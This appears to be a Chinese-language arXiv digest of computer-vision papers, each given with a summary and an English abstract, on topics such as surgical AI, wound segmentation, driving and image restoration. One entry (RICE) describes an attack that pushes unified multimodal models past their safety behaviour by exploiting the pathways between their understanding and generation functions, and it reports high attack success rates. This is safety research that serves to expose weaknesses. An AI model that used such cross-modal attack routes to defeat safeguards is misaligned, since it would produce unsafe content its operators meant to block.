机构: Center for Applied AI, Chicago Booth, Chicago, IL, USA; Surgical Data Science Collective, Washington D.C., USA; Children’s National Hospital, Washington D.C., USA; Operations Management Tolan Center for Healthcare, Chicago Booth, Chicago, IL, USA
类目: Artificial Intelligence (cs.AI); Computer Vision and Pattern Recognition (cs.CV); Machine Learning (cs.LG)
备注:
Abstract:Recent Artificial Intelligence (AI) models have matched or exceeded human experts in several benchmarks of biomedical task performance, but have lagged behind on surgical image-analysis benchmarks. Since surgery requires integrating disparate tasks – including multimodal data integration, human interaction, and physical effects – generally-capable AI models could be particularly attractive as a collaborative tool if performance could be improved. On the one hand, the canonical approach of scaling architecture size and training data is attractive, especially since there are millions of hours of surgical video data generated per year. On the other hand, preparing surgical data for AI training requires significantly higher levels of professional expertise, and training on that data requires expensive computational resources. These trade-offs paint an uncertain picture of whether and to-what-extent modern AI could aid surgical practice. In this paper, we explore this question through a case study of surgical tool detection using state-of-the-art AI methods available in 2026. We demonstrate that even with multi-billion parameter models and extensive training, current Vision Language Models fall short in the seemingly simple task of tool detection in neurosurgery. Additionally, we show scaling experiments indicating that increasing model size and training time only leads to diminishing improvements in relevant performance metrics. Thus, our experiments suggest that current models could still face significant obstacles in surgical use cases. Moreover, some obstacles cannot be simply ``scaled away’’ with additional compute and persist across diverse model architectures, raising the question of whether data and label availability are the only limiting factors. We discuss the main contributors to these constraints and advance potential solutions.
[CV-183] EVA: Bridging Performance and Human Alignment in Hard-Attention Vision Models for Image Classification
【速读】:该论文旨在解决视觉模型在仅优化分类准确率时导致的人类注视轨迹(scanpath)对齐度下降问题,即“对齐税”(alignment tax),从而限制了模型的可解释性。其解决方案的关键在于提出EVA(a neuroscience-inspired hard-attention mechanistic testbed),该框架通过引入基于CNN的特征提取器与最小化fovea-periphery表示的序列采样机制,结合方差控制(variance control)和自适应门控(adaptive gating)策略,稳定并调节注意力动态过程。EVA在无需注视监督的情况下训练,可在保持竞争性分类性能的同时显著提升扫描路径与人类眼动轨迹的一致性(如DTW、NSS指标),且具备良好的可扩展性,在ImageNet-100和COCO-Search18等复杂场景中均能生成人类相似的注视模式,为可信、可解释的主动视觉提供了原则性框架。
链接: https://arxiv.org/abs/2603.27340
作者: Pengcheng Pan,Yonekura Shogo,Kuniyoshi Yasuo
机构: The University of Tokyo (东京大学)
类目: Computer Vision and Pattern Recognition (cs.CV)
备注:
Abstract:Optimizing vision models purely for classification accuracy can impose an alignment tax, degrading human-like scanpaths and limiting interpretability. We introduce EVA, a neuroscience-inspired hard-attention mechanistic testbed that makes the performance-human-likeness trade-off explicit and adjustable. EVA samples a small number of sequential glimpses using a minimal fovea-periphery representation with CNN-based feature extractor and integrates variance control and adaptive gating to stabilize and regulate attention dynamics. EVA is trained with the standard classification objective without gaze supervision. On CIFAR-10 with dense human gaze annotations, EVA improves scanpath alignment under established metrics such as DTW, NSS, while maintaining competitive accuracy. Ablations show that CNN-based feature extraction drives accuracy but suppresses human-likeness, whereas variance control and gating restore human-aligned trajectories with minimal performance loss. We further validate EVA’s scalability on ImageNet-100 and evaluate scanpath alignment on COCO-Search18 without COCO-Search18 gaze supervision or finetuning, where EVA yields human-like scanpaths on natural scenes without additional training. Overall, EVA provides a principled framework for trustworthy, human-interpretable active vision.
[CV-184] Unsafe by Reciprocity: How Generation-Understanding Coupling Undermines Safety in Unified Multimodal Models
【速读】:该论文旨在解决统一多模态模型(Unified Multimodal Models, UMMs)中由于理解与生成功能紧密耦合所引发的安全隐患问题,尤其是现有安全研究多孤立分析理解或生成模块,忽视了二者之间双向交互可能带来的新型攻击路径。解决方案的关键在于提出RICE(Reciprocal Interaction-based Cross-functionality Exploitation)攻击范式,该方法显式利用理解模块与生成模块之间的双向交互机制,系统评估从生成到理解(G-U)和从理解到生成(U-G)两条攻击路径,揭示了不安全中间信号可在模态间传播并放大安全风险,实验表明两种方向均具有高攻击成功率(Attack Success Rate, ASR),从而识别出UMMs结构本身存在的潜在脆弱性。
链接: https://arxiv.org/abs/2603.27332
作者: Kaishen Wang,Heng Huang
机构: 未知
类目: Computer Vision and Pattern Recognition (cs.CV)
备注: 7 figures, 3 tables
Abstract:Recent advances in Large Language Models (LLMs) and Text-to-Image (T2I) models have led to the emergence of Unified Multimodal Models (UMMs), where multimodal understanding and image generation are tightly integrated within a shared architecture. Prior studies suggest that such reciprocity enhances cross-functionality performance through shared representations and joint optimization. However, the safety implications of this tight coupling remain largely unexplored, as existing safety research predominantly analyzes understanding and generation functionalities in isolation. In this work, we investigate whether cross-functionality reciprocity itself constitutes a structural source of vulnerability in UMMs. We propose RICE: Reciprocal Interaction-based Cross-functionality Exploitation, a novel attack paradigm that explicitly exploits bidirectional interactions between understanding and generation. Using this framework, we systematically evaluate Generation-to-Understanding (G-U) and Understanding-to-Generation (U-G) attack pathways, demonstrating that unsafe intermediate signals can propagate across modalities and amplify safety risks. Extensive experiments show high Attack Success Rates (ASR) in both directions, revealing previously overlooked safety weaknesses inherent to UMMs.
[CV-185] Improving Automated Wound Assessment Using Joint Boundary Segmentation and Multi-Class Classification Models
【速读】:该论文旨在解决当前人工智能(AI)模型在伤口管理中临床适用性受限的问题,即多数现有模型仅针对特定类型的伤口或仅执行单一任务(如边界分割或分类),难以满足多类型、多任务的临床需求。其解决方案的关键在于提出一种基于YOLOv11架构的深度学习模型,能够同时实现伤口边界分割(Wound Boundary Segmentation, WBS)与伤口分类(Wound Classification, WC)两大任务,涵盖五类临床相关伤口类型(烧伤、压力性损伤、糖尿病足溃疡、血管性溃疡和手术切口)。研究通过构建一个类型平衡的2,963张标注图像数据集,并采用分层五折交叉验证确保评估的鲁棒性;进一步引入旋转、翻转及亮度、饱和度和曝光变化的数据增强策略,显著提升了模型对视觉特征细微的烧伤病例的检测能力,最终YOLOv11x在两项任务上分别达到F1-score 0.9341(WBS)和0.8736(WC),而轻量级YOLOv11n则在保持较高精度的同时降低了计算开销,适用于资源受限场景。
链接: https://arxiv.org/abs/2603.27325
作者: Mehedi Hasan Tusar,Fateme Fayyazbakhsh,Igor Melnychuk,Ming C. Leu
机构: 未知
类目: Computer Vision and Pattern Recognition (cs.CV); Artificial Intelligence (cs.AI)
备注:
Abstract:Accurate wound classification and boundary segmentation are essential for guiding clinical decisions in both chronic and acute wound management. However, most existing AI models are limited, focusing on a narrow set of wound types or performing only a single task (segmentation or classification), which reduces their clinical applicability. This study presents a deep learning model based on YOLOv11 that simultaneously performs wound boundary segmentation (WBS) and wound classification (WC) across five clinically relevant wound types: burn injury (BI), pressure injury (PI), diabetic foot ulcer (DFU), vascular ulcer (VU), and surgical wound (SW). A wound-type balanced dataset of 2,963 annotated images was created to train the models for both tasks, with stratified five-fold cross-validation ensuring robust and unbiased evaluation. The models trained on the original non-augmented dataset achieved consistent performance across folds, though BI detection accuracy was relatively lower. Therefore, the dataset was augmented using rotation, flipping, and variations in brightness, saturation, and exposure to help the model learn more generalized and invariant features. This augmentation significantly improved model performance, particularly in detecting visually subtle BI cases. Among tested variants, YOLOv11x achieved the highest performance with F1-scores of 0.9341 (WBS) and 0.8736 (WC), while the lightweight YOLOv11n provided comparable accuracy at lower computational cost, making it suitable for resource-constrained deployments. Supported by confusion matrices and visual detection outputs, the results confirm the model’s robustness against complex backgrounds and high intra-class variability, demonstrating the potential of YOLOv11-based architectures for accurate, real-time wound analysis in both clinical and remote care settings.
[CV-186] okenDance: Token-to-Token Music-to-Dance Generation with Bidirectional Mamba CVPR2026
【速读】:该论文旨在解决当前音乐到舞蹈生成模型在真实世界应用中表现不佳的问题,其核心瓶颈在于现有3D舞蹈数据集覆盖范围有限,导致模型对音乐风格和编舞模式的泛化能力弱,进而生成的舞蹈动作趋于简单重复,缺乏表现力与真实性。解决方案的关键在于提出一种两阶段框架TokenDance,通过双模态离散化(Dual-modality tokenization)与高效的token级生成机制实现突破:第一阶段利用有限标量量化(Finite Scalar Quantization)将舞蹈动作分解为上下肢组件并施加运动学-动力学约束,同时将音乐拆分为语义与声学特征并分别建模,从而显式捕捉编舞结构;第二阶段采用基于双向Mamba架构的局部-全局-局部token-to-token生成器,在保证强音乐-舞蹈对齐的同时实现非自回归高效推理,显著提升生成质量与速度,达到当前最优性能(SOTA)。
链接: https://arxiv.org/abs/2603.27314
作者: Ziyue Yang,Kaixing Yang,Xulong Tang
机构: Brown University (布朗大学); Renmin University of China (中国人民大学); The University of Texas at Dallas (德克萨斯大学达拉斯分校)
类目: Artificial Intelligence (cs.AI); Computer Vision and Pattern Recognition (cs.CV); Sound (cs.SD)
备注: CVPR2026 Workshop on HuMoGen
Abstract:Music-to-dance generation has broad applications in virtual reality, dance education, and digital character animation. However, the limited coverage of existing 3D dance datasets confines current models to a narrow subset of music styles and choreographic patterns, resulting in poor generalization to real-world music. Consequently, generated dances often become overly simplistic and repetitive, substantially degrading expressiveness and realism. To tackle this problem, we present TokenDance, a two-stage music-to-dance generation framework that explicitly addresses this limitation through dual-modality tokenization and efficient token-level generation. In the first stage, we discretize both dance and music using Finite Scalar Quantization, where dance motions are factorized into upper and lower-body components with kinematic-dynamic constraints, and music is decomposed into semantic and acoustic features with dedicated codebooks to capture choreography-specific structures. In the second stage, we introduce a Local-Global-Local token-to-token generator built on a Bidirectional Mamba backbone, enabling coherent motion synthesis, strong music-dance alignment, and efficient non-autoregressive inference. Extensive experiments demonstrate that TokenDance achieves overall state-of-the-art (SOTA) performance in both generation quality and inference speed, highlighting its effectiveness and practical value for real-world music-to-dance applications. Comments: CVPR2026 Workshop on HuMoGen Subjects: Artificial Intelligence (cs.AI); Computer Vision and Pattern Recognition (cs.CV); Sound (cs.SD) Cite as: arXiv:2603.27314 [cs.AI] (or arXiv:2603.27314v1 [cs.AI] for this version) https://doi.org/10.48550/arXiv.2603.27314 Focus to learn more arXiv-issued DOI via DataCite (pending registration)
[CV-187] MeshTailor: Cutting Seams via Generative Mesh Traversal
【速读】:该论文旨在解决3D表面中边缘对齐接缝(edge-aligned seams)生成的难题,现有方法多依赖于基于优化或外在学习的方式,存在投影伪影和脆弱的贴合启发式策略等问题。其解决方案的关键在于提出MeshTailor——首个直接在网格图(mesh graph)上操作的生成式框架,通过引入ChainingSeams机制实现从粗到细的层次化接缝序列化,优先考虑全局结构切割再细化局部细节,并采用双流编码器融合拓扑与几何上下文信息;在此基础上,利用自回归指针层在局部邻域内逐顶点追踪接缝路径,从而实现无投影、边缘对齐的高质量接缝生成。
链接: https://arxiv.org/abs/2603.27309
作者: Xueqi Ma,Xingguang Yan,Congyue Zhang,Hui Huang
机构: Shenzhen University (深圳大学); Simon Fraser University (西蒙弗雷泽大学)
类目: Graphics (cs.GR); Computer Vision and Pattern Recognition (cs.CV)
备注:
Abstract:We present MeshTailor, the first mesh-native generative framework for synthesizing edge-aligned seams on 3D surfaces. Unlike prior optimization-based or extrinsic learning-based methods, MeshTailor operates directly on the mesh graph, eliminating projection artifacts and fragile snapping heuristics. We introduce ChainingSeams, a hierarchical serialization of the seam graph that prioritizes global structural cuts before local details in a coarse-to-fine manner, and a dual-stream encoder that fuses topological and geometric context. Leveraging this hierarchical representation and enriched vertex embeddings, our MeshTailor Transformer utilizes an autoregressive pointer layer to trace seams vertex-by-vertex within local neighborhoods, ensuring projection-free, edge-aligned seams. Extensive evaluations show that MeshTailor produces more coherent, professional-quality seam layouts compared to recent optimization-based and learning-based baselines.
[CV-188] Dual-Path Learning based on Frequency Structural Decoupling and Regional-Aware Fusion for Low-Light Image Super-Resolution
【速读】:该论文旨在解决低光照图像超分辨率(Low-light Image Super-Resolution, LLISR)任务中因串行处理亮度与纹理信息而导致的伪影放大、纹理抑制和结构退化问题。现有方法虽在单一任务上表现优异,但缺乏对多频特征的协同建模能力。其解决方案的关键在于提出一种频率感知的解耦感知框架(Decoupling then Perceive, DTP),通过三个核心模块实现:1)频率感知结构解耦(Frequency-aware Structural Decoupling, FSD)机制,自适应地将输入图像分离为低频亮度和高频纹理子空间;2)语义特异性双路径表示(Semantics-specific Dual-path Representation, SDR)学习策略,针对不同频段进行差异化增强与重建;3)跨频语义重组(Cross-frequency Semantic Recomposition, CSR)模块,确保重构结果在结构一致性和感知质量上的优化。该框架实现了亮度与纹理的语义独立建模与协同重建,显著提升了LLISR任务的性能指标。
链接: https://arxiv.org/abs/2603.27301
作者: Ji-Xuan He,Jia-Cheng Zhao,Feng-Qi Cui,Jinyang Huang,Yang Liu,Sirui Zhao,Meng Li,Zhi Liu
机构: 未知
类目: Computer Vision and Pattern Recognition (cs.CV)
备注:
Abstract:Low-light image super-resolution (LLISR) is essential for restoring fine visual details and perceptual quality under insufficient illumination conditions with ubiquitous low-resolution devices. Although pioneer methods achieve high performance on single tasks, they solve both tasks in a serial manner, which inevitably leads to artifact amplification, texture suppression, and structural degradation. To address this, we propose Decoupling then Perceive (DTP), a novel frequency-aware framework that explicitly separates luminance and texture into semantically independent components, enabling specialized modeling and coherent reconstruction. Specifically, to adaptively separate the input into low-frequency luminance and high-frequency texture subspaces, we propose a Frequency-aware Structural Decoupling (FSD) mechanism, which lays a solid foundation for targeted representation learning and reconstruction. Based on the decoupled representation, a Semantics-specific Dual-path Representation (SDR) learning strategy that performs targeted enhancement and reconstruction for each frequency component is further designed, facilitating robust luminance adjustment and fine-grained texture recovery. To promote structural consistency and perceptual alignment in the reconstructed output, building upon this dual-path modeling, we further introduce a Cross-frequency Semantic Recomposition (CSR) module that selectively integrates the decoupled representations. Extensive experiments on the most widely used LLISR benchmarks demonstrate the superiority of our DTP framework, improving + 1.6% PSNR, + 9.6% SSIM, and - 48% LPIPS compared to the most state-of-the-art (SOTA) algorithm. Codes are released at this https URL.
[CV-189] Complet4R: Geometric Complete 4D Reconstruction
【速读】:该论文旨在解决动态场景中几何完整的四维(4D)重建问题,即在时间维度上恢复具有时空一致性的完整三维几何结构,尤其针对被遮挡区域的补全问题。传统方法依赖于成对重建或局部运动估计,难以实现全局一致性与完整性。其解决方案的关键在于提出Complet4R框架,该框架将几何完整4D重建任务统一建模为一个端到端的重建与补全联合优化问题,通过解码器-only Transformer直接从视频序列中全局聚合上下文信息,并逐帧重建包含可见与不可见区域的完整几何结构,从而在时间上保持一致性并提升空间完整性。
链接: https://arxiv.org/abs/2603.27300
作者: Weibang Wang,Kenan Li,Zhuoguang Chen,Yijun Yuan,Hang Zhao
机构: IIIS, Tsinghua University (清华大学); Shanghai Artificial Intelligence Laboratory (上海人工智能实验室); Shanghai Qi Zhi Institute (上海奇智研究院)
类目: Computer Vision and Pattern Recognition (cs.CV)
备注:
Abstract:We introduce Complet4R, a novel end-to-end framework for Geometric Complete 4D Reconstruction, which aims to recover temporally coherent and geometrically complete reconstruction for dynamic scenes. Our method formalizes the task of Geometric Complete 4D Reconstruction as a unified framework of reconstruction and completion, by directly accumulating full contexts onto each frame. Unlike previous approaches that rely on pairwise reconstruction or local motion estimation, Complet4R utilizes a decoder-only transformer to operate all context globally directly from sequential video input, reconstructing a complete geometry for every single timestamp, including occluded regions visible in other frames. Our method demonstrates the state-of-the-art performance on our proposed benchmark for Geometric Complete 4D Reconstruction and the 3D Point Tracking task. Code will be released to support future research.
[CV-190] Class-Distribution Guided Active Learning for 3D Occupancy Prediction in Autonomous Driving
【速读】:该论文旨在解决3D占用预测(3D occupancy prediction)任务中因体素(voxel)级表示导致的严重类别不平衡问题,以及标注成本高、对主导类别的标注效率低等挑战。其核心解决方案是提出一种基于类别分布引导的主动学习(class-distribution guided active learning)框架,通过三个互补的采样标准实现高效样本选择:(1)样本间多样性(inter-sample diversity),优先选择预测类别分布与已标注集差异较大的样本;(2)组内多样性(intra-set diversity),避免单次采集周期内的冗余采样;(3)频率加权不确定性(frequency-weighted uncertainty),通过将体素级熵重新加权为每样本类别比例的逆数,增强对稀有类别的关注。该方法在仅使用42.4%标注数据的情况下达到与全监督相当的性能(mIoU 26.62),并验证了在不同数据集和架构下的泛化能力。
链接: https://arxiv.org/abs/2603.27294
作者: Wonjune Kim,In-Jae Lee,Sihwan Hwang,Sanmin Kim,Dongsuk Kum
机构: KAIST(韩国科学技术院); Seoul National University (首尔国立大学); Kookmin University (酷似大学)
类目: Computer Vision and Pattern Recognition (cs.CV)
备注: IEEE RA-L 2026
Abstract:3D occupancy prediction provides dense spatial understanding critical for safe autonomous driving. However, this task suffers from a severe class imbalance due to its volumetric representation, where safety-critical objects (bicycles, traffic cones, pedestrians) occupy minimal voxels compared to dominant backgrounds. Additionally, voxel-level annotation is costly, yet dedicating effort to dominant classes is inefficient. To address these challenges, we propose a class-distribution guided active learning framework for selecting training samples to annotate in autonomous driving datasets. Our approach combines three complementary criteria to select the training samples. Inter-sample diversity prioritizes samples whose predicted class distributions differ from those of the labeled set, intra-set diversity prevents redundant sampling within each acquisition cycle, and frequency-weighted uncertainty emphasizes rare classes by reweighting voxel-level entropy with inverse per-sample class proportions. We ensure evaluation validity by using a geographically disjoint train/validation split of Occ3D-nuScenes, which reduces train-validation overlap and mitigates potential map memorization. With only 42.4% labeled data, our framework reaches 26.62 mIoU, comparable to full supervision and outperforming active learning baselines at the same budget. We further validate generality on SemanticKITTI using a different architecture, demonstrating consistent effectiveness across datasets.
[CV-191] Human-Centric Perception for Child Sexual Abuse Imagery
【速读】:该论文旨在解决儿童性虐待影像(Child Sexual Abuse Imagery, CSAI)分类中因缺乏客观性和可解释性而导致的自动化识别难题。当前方法多依赖黑箱模型,难以准确捕捉图像中与性暗示相关的细微线索(如姿势、衣着等),且缺乏对人类身体结构的细粒度建模。其解决方案的关键在于引入一个全新的、具有层级标签的人体关键点与部位数据集——Body-Keypoint-Part Dataset (BKPD),并提出两种联合姿态估计与目标检测的方法:BKP-Association 和 YOLO-BKP,实现对个体及其身体部位(头、胸、髋、手等)的分解式表征。该方法通过显式建模人体结构特征,提升了对含性暗示内容的判别能力,并为未来构建更透明、可解释的CSAI分类系统提供了新路径。
链接: https://arxiv.org/abs/2603.27290
作者: Camila Laranjeira,João Macedo,Sandra Avila,Fabrício Benevenuto,Jefersson A. dos Santos
机构: 未知
类目: Computer Vision and Pattern Recognition (cs.CV)
备注: submitted to IEEE Transactions on Information Forensics and Security (TIFS)
Abstract:Law enforcement agencies and non-gonvernmental organizations handling reports of Child Sexual Abuse Imagery (CSAI) are overwhelmed by large volumes of data, requiring the aid of automation tools. However, defining sexual abuse in images of children is inherently challenging, encompassing sexually explicit activities and hints of sexuality conveyed by the individual’s pose, or their attire. CSAI classification methods often rely on black-box approaches, targeting broad and abstract concepts such as pornography. Thus, our work is an in-depth exploration of tasks from the literature on Human-Centric Perception, across the domains of safe images, adult pornography, and CSAI, focusing on targets that enable more objective and explainable pipelines for CSAI classification in the future. We introduce the Body-Keypoint-Part Dataset (BKPD), gathering images of people from varying age groups and sexual explicitness to approximate the domain of CSAI, along with manually curated hierarchically structured labels for skeletal keypoints and bounding boxes for person and body parts, including head, chest, hip, and hands. We propose two methods, namely BKP-Association and YOLO-BKP, for simultaneous pose estimation and detection, with targets associated per individual for a comprehensive decomposed representation of each person. Our methods are benchmarked on COCO-Keypoints and COCO-HumanParts, as well as our human-centric dataset, achieving competitive results with models that jointly perform all tasks. Cross-domain ablation studies on BKPD and a case study on RCPD highlight the challenges posed by sexually explicit domains. Our study addresses previously unexplored targets in the CSAI domain, paving the way for novel research opportunities.
[CV-192] Uni-World VLA: Interleaved World Modeling and Planning for Autonomous Driving ECCV2026
【速读】:该论文旨在解决自动驾驶中世界模型(world model)与规划(planning)分离导致的开环推理问题,即传统方法先预测未来场景再进行规划,容易因预测偏差而偏离实际决策路径。解决方案的关键在于提出一种统一视觉-语言-动作(Vision-Language-Action, VLA)模型 Uni-World VLA,通过紧密交织未来帧预测与轨迹规划,在每一步交替生成未来帧和自车动作,使规划决策持续基于想象中的未来观测进行条件调整,从而形成世界建模与控制之间的闭环交互,提升动态交通场景下的适应性决策能力。此外,引入单目深度信息增强几何线索,进一步改善长时程场景预测精度。
链接: https://arxiv.org/abs/2603.27287
作者: Qiqi Liu,Huan Xu,Jingyu Li,Bin Sun,Zhihui Hao,Dangen She,Xiatian Zhu,Li Zhang
机构: 未知
类目: Robotics (cs.RO); Computer Vision and Pattern Recognition (cs.CV)
备注: 22 pages, 8 figures. Submitted to ECCV 2026. Code will be released
Abstract:Autonomous driving requires reasoning about how the environment evolves and planning actions accordingly. Existing world-model-based approaches typically predict future scenes first and plan afterwards, resulting in open-loop imagination that may drift from the actual decision process. In this paper, we present Uni-World VLA, a unified vision-language-action (VLA) model that tightly interleaves future frame prediction and trajectory planning. Instead of generating a full world rollout before planning, our model alternates between predicting future frames and ego actions step by step, allowing planning decisions to be continuously conditioned on the imagined future observations. This interleaved generation forms a closed-loop interaction between world modeling and control, enabling more adaptive decision-making in dynamic traffic scenarios. In addition, we incorporate monocular depth information into frames to provide stronger geometric cues for world modeling, improving long-horizon scene prediction. Experiments on the NAVSIM benchmark show that our approach achieves competitive closed-loop planning performance while producing high-fidelity future frame predictions. These results demonstrate that tightly coupling world prediction and planning is a promising direction for scalable VLA driving systems.
[CV-193] rackMAE: Video Representation Learning via Track Mask and Predict CVPR2026
【速读】:该论文旨在解决当前掩码视频建模(Masked Video Modeling, MVM)方法在自监督预训练中隐式编码运动信息、导致时序动态表征能力不足的问题,从而限制了模型在以运动为中心的任务上的性能表现。解决方案的关键在于提出TrackMAE框架,其核心创新是显式利用运动信息作为重建信号:首先通过现成的点追踪器稀疏地提取视频中的运动轨迹,进而设计一种基于运动感知的掩码策略改进随机管状掩码(random tube masking),并在像素和特征语义重建空间中引入运动目标作为互补监督信号,从而增强视频表示的学习效果。
链接: https://arxiv.org/abs/2603.27268
作者: Renaud Vandeghen,Fida Mohammad Thoker,Marc Van Droogenbroeck,Bernard Ghanem
机构: University of Liège (列日大学); KAUST (阿卜杜拉国王科技大学)
类目: Computer Vision and Pattern Recognition (cs.CV)
备注: Accepted to CVPR 2026
Abstract:Masked video modeling (MVM) has emerged as a simple and scalable self-supervised pretraining paradigm, but only encodes motion information implicitly, limiting the encoding of temporal dynamics in the learned representations. As a result, such models struggle on motion-centric tasks that require fine-grained motion awareness. To address this, we propose TrackMAE, a simple masked video modeling paradigm that explicitly uses motion information as a reconstruction signal. In TrackMAE, we use an off-the-shelf point tracker to sparsely track points in the input videos, generating motion trajectories. Furthermore, we exploit the extracted trajectories to improve random tube masking with a motion-aware masking strategy. We enhance video representations learned in both pixel and feature semantic reconstruction spaces by providing a complementary supervision signal in the form of motion targets. We evaluate on six datasets across diverse downstream settings and find that TrackMAE consistently outperforms state-of-the-art video self-supervised learning baselines, learning more discriminative and generalizable representations. Code available at this https URL
[CV-194] rendGen: An Outfit Recommendation and Display System
【速读】:该论文旨在解决时尚电商中因原始图像存在光照不一致、衣物角度不佳、背景复杂及遮挡等问题,导致生成式 AI(Generative AI)在服装理解与推荐任务中性能受限的挑战。其解决方案的关键在于提出 TrendGen 系统,该系统通过融合衣物图像与商品属性信息,利用生成式 AI 技术将低质量原始图像转换为高质量的平铺视图(lay-down views),从而提升在线购物场景下智能穿搭推荐的准确性与一致性,实现更符合潮流趋势且结构清晰的服饰展示。
链接: https://arxiv.org/abs/2603.27264
作者: Theodoros Koukopoulos,Dimos Klimenof,Ioannis Xarchakos
机构: SabinoDB(萨比诺数据库); University of Toronto(多伦多大学)
类目: Computer Vision and Pattern Recognition (cs.CV)
备注:
Abstract:Recent advances in Computer Vision have significantly improved image understanding and generation, revolutionizing the fashion industry. However, challenges such as inconsistent lighting, non-ideal garment angles, complex backgrounds, and occlusions in raw images hinder their full potential. Overcoming these obstacles is crucial for developing robust fashion AI systems capable of real-world applications. In this paper, we introduce TrendGen, a Fashion AI system designed to enhance online shopping with intelligent outfit recommendations. Deployed on a major e-commerce platform, TrendGen leverages cloth images and product attributes to generate trend-aligned, cohesive outfit suggestions. Additionally, it employs Generative AI to transform raw images into high-quality lay-down views, offering a clear and structured presentation of garments. Our evaluation on production data demonstrates TrendGen’s consistent high-quality outfits and lay-down images, marking a significant advancement in AI-driven solutions for fashion retail. Subjects: Computer Vision and Pattern Recognition (cs.CV) Cite as: arXiv:2603.27264 [cs.CV] (or arXiv:2603.27264v1 [cs.CV] for this version) https://doi.org/10.48550/arXiv.2603.27264 Focus to learn more arXiv-issued DOI via DataCite (pending registration)
[CV-195] MD-RWKV-UNet: Scale-Aware Anatomical Encoding with Cross-Stage Fusion for Multi-Organ Segmentation
【速读】:该论文旨在解决多器官分割中因解剖结构变异大、器官间复杂依赖关系以及器官尺度和形状多样导致的挑战,尤其是传统编码器-解码器架构难以同时捕捉细粒度局部细节与长程上下文信息的问题。其解决方案的关键在于提出MD-RWKV-UNet,该模型的核心是MD-RWKV模块——一种双路径结构,融合可变形空间偏移(deformable spatial shifts)与接收权重键值机制(Receptance Weighted Key Value, RWKV),使感受野能够动态适应局部结构线索;同时引入选择性核注意力(Selective Kernel Attention)以自适应选择不同感受野的卷积核,增强多尺度交互并提升对器官尺寸与形态变化的鲁棒性;此外,跨阶段双注意力融合策略在编码器中聚合多层次特征,在保留低层结构的同时增强语义一致性,从而实现轻量但表达能力强的动态器官建模。
链接: https://arxiv.org/abs/2603.27261
作者: Zhuoyi Fang
机构: 未知
类目: Computer Vision and Pattern Recognition (cs.CV); Image and Video Processing (eess.IV)
备注:
Abstract:Multi-organ segmentation in medical imaging remains challenging due to large anatomical variability, complex inter-organ dependencies, and diverse organ scales and shapes. Conventional encoder-decoder architectures often struggle to capture both fine-grained local details and long-range context, which are crucial for accurate delineation - especially for small or deformable organs. To address these limitations, we propose MD-RWKV-UNet, a dynamic encoder network that enables scale-aware representation and spatially adaptive context modeling. At its core is the MD-RWKV block, a dual-path module that integrates deformable spatial shifts with the Receptance Weighted Key Value mechanism, allowing the receptive field to adapt dynamically to local structural cues. We further incorporate Selective Kernel Attention to enable adaptive selection of convolutional kernels with varying receptive fields, enhancing multi-scale interaction and improving robustness to organ size and shape variation. In parallel, a cross-stage dual-attention fusion strategy aggregates multi-level features across the encoder, preserving low-level structure while enhancing semantic consistency. Unlike methods that stack static convolutions or rely heavily on global attention, our approach provides a lightweight yet expressive solution for dynamic organ modeling. Experiments on Synapse and ACDC demonstrate state-of-the-art performance, particularly in boundary precision and small-organ segmentation.
[CV-196] Seeing the Scene Matters: Revealing Forgetting in Video Understanding Models with a Scene-Aware Long-Video Benchmark
【速读】:该论文旨在解决当前视觉语言模型(Vision-Language Models, VLMs)在长视频理解(Long Video Understanding, LVU)中对场景级(scene-level)时序上下文建模能力不足的问题,即现有模型在面对跨场景的长期依赖关系时存在显著的记忆衰退现象。其解决方案的关键在于提出一个全新的基准测试工具——SceneBench,用于系统评估VLMs在场景级语义一致性下的推理能力,并进一步引入场景检索增强生成(Scene Retrieval-Augmented Generation, Scene-RAG),通过动态构建场景记忆机制来整合跨场景的相关上下文信息,从而提升模型对长程时序信息的保留与利用能力,实验表明该方法可使性能提升2.50%。
链接: https://arxiv.org/abs/2603.27259
作者: Seng Nam Chen,Hao Chen,Chenglam Ho,Xinyu Mao,Jinping Wang,Yu Zhang,Chao Li
机构: 未知
类目: Computer Vision and Pattern Recognition (cs.CV)
备注:
Abstract:Long video understanding (LVU) remains a core challenge in multimodal learning. Although recent vision-language models (VLMs) have made notable progress, existing benchmarks mainly focus on either fine-grained perception or coarse summarization, offering limited insight into temporal understanding over long contexts. In this work, we define a scene as a coherent segment of a video in which both visual and semantic contexts remain consistent, aligning with human perception. This leads us to a key question: can current VLMs reason effectively over long, scene-level contexts? To answer this, we introduce a new benchmark, SceneBench, designed to provide scene-level challenges. Our evaluation reveals a sharp drop in accuracy when VLMs attempt to answer scene-level questions, indicating significant forgetting of long-range context. To further validate these findings, we propose Scene Retrieval-Augmented Generation (Scene-RAG), which constructs a dynamic scene memory by retrieving and integrating relevant context across scenes. This Scene-RAG improves VLM performance by +2.50%, confirming that current models still struggle with long-context retention. We hope SceneBench will encourage future research toward VLMs with more robust, human-like video comprehension.
[CV-197] Zero-shot Vision-Language Reranking for Cross-View Geolocalization
【速读】:该论文旨在解决跨视角地理定位(Cross-view Geolocalization, CVGL)系统在高召回率(Recall@k)下难以准确识别最优匹配(Top-1精度低)的问题。其解决方案的关键在于引入零样本视觉语言模型(Vision-Language Models, VLMs)作为重排序器(reranker),并提出一个两阶段框架:首先使用当前最优检索方法获取候选集,再通过VLM对候选进行重排序。研究发现,基于点对点(Pointwise)的绝对相关性评分策略会导致性能严重下降或无改善,而基于成对比较(Pairwise)的相对判断策略则能有效提升Top-1准确率,尤其当采用LLaVA模型时表现显著。核心结论是:VLMs虽不擅长绝对相关性打分,但在细粒度视觉对比判断上具有优势,因此Pairwise重排序是提升CVGL精度的有效路径。
链接: https://arxiv.org/abs/2603.27251
作者: Yunus Talha Erzurumlu,John E. Anderson,William J. Shuart,Charles Toth,Alper Yilmaz
机构: The Ohio State University(俄亥俄州立大学); US Army Corps of Engineers Geospatial Research Lab(美国陆军工程兵团地理空间研究实验室)
类目: Computer Vision and Pattern Recognition (cs.CV); Artificial Intelligence (cs.AI)
备注: 7 pages, 4 figures. Accepted to XXV ISPRS Congress
